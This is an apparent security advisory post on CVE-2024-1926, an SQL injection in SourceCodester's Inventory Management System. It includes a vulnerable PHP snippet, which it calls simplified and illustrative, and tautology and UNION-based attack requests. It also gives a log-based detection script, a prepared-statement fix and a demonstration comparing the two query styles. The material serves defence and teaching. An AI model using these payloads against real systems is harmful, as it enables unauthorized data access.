A critical security flaw has been discovered in SourceCodester's Free and Open Source Inventory Management System (version 1.). This vulnerability, tracked as CVE-2024-1926 (see VDB-254861), allows remote attackers to perform SQL Injection by manipulating the customer parameter in one of the application's AJAX requests. This long-form post explains how the vulnerability works, offers technical details, shows relevant code snippets, explores exploitation techniques, and provides references for further reading. Our aim is to help users, sysadmins, and developers understand and mitigate the risk.

- Product: SourceCodester Free and Open Source Inventory Management System 1.
- Component: /app/ajax/search_sales_report.php
- Attack Vector: Remote
- CVE Reference: CVE-2024-1926
- Vulnerability Database Reference: VDB-254861

Technical Breakdown

The issue lies in how the web application processes user input for the customer parameter inside the search_sales_report.php file. User-supplied data is inserted into an SQL query without proper sanitization or escaping, allowing attackers to modify the query.

On the backend, the code in search_sales_report.php might look like this simplified PHP snippet:

<?php
// This is a simplified example for demonstration
include("db_connect.php");
$customer = $_GET['customer'];   // <-- user-controlled
$sql = "SELECT * FROM sales WHERE customer = '$customer'";
$result = mysqli_query($conn, $sql);
?>

Notice that the customer input from the URL is inserted directly into the SQL statement without any sanitization.

Here is what a normal request looks like:

GET /app/ajax/search_sales_report.php?customer=John HTTP/1.1
Host: target.site

An attacker could exploit the flaw using a URL like:

GET /app/ajax/search_sales_report.php?customer=John'%20OR%201=1--+ HTTP/1.1
Host: target.site

This modifies the SQL to:

SELECT * FROM sales WHERE customer = 'John' OR 1=1-- '

What does it do?
The OR 1=1 part makes the WHERE condition always true, so the query returns every record in the table, not just John's. With more advanced payloads, an attacker could dump sensitive data, bypass authentication, or modify records.

The following payload extracts the database version (on MySQL):

GET /app/ajax/search_sales_report.php?customer=' UNION SELECT 1,@@version,3,4--+ HTTP/1.1
Host: target.site

Impact

- Data exposure: The attacker could read (and possibly write or delete) sensitive data.
- Privilege escalation: In some cases, the attacker could take full control of the database or the application.

Mitigation

- Sanitize input: Filter and escape all user-supplied data, and pass it to the database through parameterized queries so that input can never change the structure of the statement.
- Update software: Apply official patches or updates if/when they become available.
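For operators who cannot patch immediately, the following Python script is an added example for detection (it is not part of this advisory or of the SourceCodester project). It parses web-server access-log lines in combined log format, URL-decodes the customer parameter of requests to /app/ajax/search_sales_report.php, and flags values in which a quote is followed by SQL syntax or a comment terminator. The log lines, client addresses and timestamps are constructed for the example; the two flagged requests carry the same payload shapes shown above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in combined log format; not real traffic.
# Two lines carry the payload shapes from the advisory, one carries a
# legitimate apostrophe (O'Brien) that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2024:17:20:01 +0000] "GET /app/ajax/search_sales_report.php?customer=John HTTP/1.1" 200 512
203.0.113.5 - - [27/Feb/2024:17:20:02 +0000] "GET /app/ajax/search_sales_report.php?customer=O%27Brien HTTP/1.1" 200 498
198.51.100.9 - - [27/Feb/2024:17:21:13 +0000] "GET /app/ajax/search_sales_report.php?customer=John'%20OR%201=1--+ HTTP/1.1" 200 40961
198.51.100.9 - - [27/Feb/2024:17:21:15 +0000] "GET /app/ajax/search_sales_report.php?customer='%20UNION%20SELECT%201,@@version,3,4--+ HTTP/1.1" 200 611
203.0.113.7 - - [27/Feb/2024:17:22:40 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Only the endpoint and parameter named in the advisory are inspected.
WATCHED_PATH = "/app/ajax/search_sales_report.php"
WATCHED_PARAM = "customer"

# A lone apostrophe is normal in names; the signal is a quote that breaks out
# of the string literal and is immediately followed by SQL (OR, UNION, a
# comment terminator, a statement separator).
QUOTE_THEN_SQL = re.compile(
    r"""['"]\s*(?:(?:or|and|union|select)\b|--|/\*|;)""", re.IGNORECASE
)
COMMENT_TERMINATOR = re.compile(r"--|/\*")


def is_suspicious(value):
    """Heuristic: quote followed by SQL, or a quote plus a comment marker."""
    if QUOTE_THEN_SQL.search(value):
        return True
    has_quote = "'" in value or '"' in value
    return has_quote and bool(COMMENT_TERMINATOR.search(value))


def parse_line(line):
    """Split one log line into its fields; returns None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs splits on the first '=' only, so a payload containing 1=1
    # stays intact, and %20 / '+' are decoded to spaces.
    params = parse_qs(parts.query, keep_blank_values=True)
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "params": params,
        "status": m.group("status"),
    }


def scan(log_text):
    """Return one hit per suspicious customer value sent to the watched path."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != WATCHED_PATH:
            continue
        for value in rec["params"].get(WATCHED_PARAM, []):
            if is_suspicious(value):
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "value": value})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} customer={hit['value']!r}")
```

The rule deliberately requires SQL syntax right after the quote, so O'Brien and "Bob's Bar and Grill" pass while the two payload lines are reported. It is a triage heuristic, not a WAF: encodings beyond standard percent-encoding and tautologies without keywords (for example 1'='1) are not covered, so treat hits as leads to correlate with response sizes and source addresses rather than as a complete detector.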

Fixed (using prepared statements with mysqli):

<?php
include("db_connect.php");
$customer = $_GET['customer'] ?? '';
// The placeholder fixes the query structure; the value is sent to the server
// separately and can never be interpreted as SQL.
$stmt = $conn->prepare("SELECT * FROM sales WHERE customer = ?");
if ($stmt === false) {
    http_response_code(500);
    exit;
}
$stmt->bind_param("s", $customer);
$stmt->execute();
$result = $stmt->get_result();
?>
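To make the difference between the two snippets concrete, here is an added Python example (not code from the advisory or the SourceCodester project) that runs the same two query shapes against an in-memory SQLite table with constructed sample rows. The vulnerable function splices the customer value into the SQL text exactly as the original endpoint does; the safe function binds it as a parameter as the fix does. The same tautology payload shown above returns every row from the first and nothing from the second, and a legitimate name containing an apostrophe breaks the vulnerable query outright.

```python
import sqlite3

# Constructed sample data standing in for the application's `sales` table.
SAMPLE_ROWS = [
    (1, "John", "Widget", 120.00),
    (2, "Alice", "Gadget", 80.00),
    (3, "O'Brien", "Gizmo", 45.50),
]


def make_db():
    """Create an in-memory database with a four-column sales table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sales (id INTEGER PRIMARY KEY, customer TEXT, "
        "item TEXT, amount REAL)"
    )
    conn.executemany("INSERT INTO sales VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_search(conn, customer):
    # Mirrors the vulnerable pattern: the value becomes part of the SQL text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM sales WHERE customer = '{customer}'"
    return conn.execute(sql).fetchall()


def safe_search(conn, customer):
    # Mirrors the fix: the statement is parsed once with a placeholder and the
    # value is bound afterwards, so it can only ever be compared as a string.
    return conn.execute(
        "SELECT * FROM sales WHERE customer = ?", (customer,)
    ).fetchall()


def compare(customer):
    """Row counts (or the error) each variant produces for one input value."""
    conn = make_db()
    try:
        try:
            vulnerable = len(vulnerable_search(conn, customer))
        except sqlite3.Error as exc:
            vulnerable = f"error: {exc}"
        return {"vulnerable": vulnerable, "safe": len(safe_search(conn, customer))}
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("John", "John' OR 1=1--", "O'Brien"):
        print(f"{value!r:>20} -> {compare(value)}")
```

With the tautology input the vulnerable variant returns all three rows while the parameterized one returns zero, because no customer is literally named "John' OR 1=1--". The O'Brien case shows a second cost of string concatenation: an ordinary apostrophe produces a syntax error, which is both a functional bug and the kind of error message that reveals the injection point.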

References

- CVE-2024-1926 Record at MITRE
- VulDB: VDB-254861
- Original Project at SourceCodester
- OWASP SQL Injection Guide

Conclusion

CVE-2024-1926 in SourceCodester's Inventory Management System serves as a reminder of the importance of secure coding—never trust user input!
If you use this software (or any similar open-source application), audit your code and apply security best practices. Knowing how vulnerabilities are exploited can help everyone be safer online.

Timeline

Published on: 02/27/2024 17:15:11 UTC
Last modified on: 03/21/2024 02:51:49 UTC